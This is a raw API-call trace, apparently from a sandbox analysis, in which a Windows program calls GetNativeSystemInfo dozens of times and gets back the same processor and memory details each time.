	[0122.705] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.705] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.706] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.706] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.706] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.706] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.706] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.706] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.706] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.706] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.706] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.706] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.706] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.707] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.707] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.707] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.707] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.707] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.707] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.707] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.707] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.707] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.707] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.707] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.707] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.708] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.708] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.708] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.708] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.708] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.708] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.708] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.708] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.708] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.708] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.708] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.708] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.709] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.709] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.709] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.709] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.709] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.709] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.709] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.709] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.709] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.709] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.709] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.710] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.710] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.710] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.710] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.710] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.710] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.710] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.710] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.710] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.710] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.710] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.710] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.711] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.711] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0122.711] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
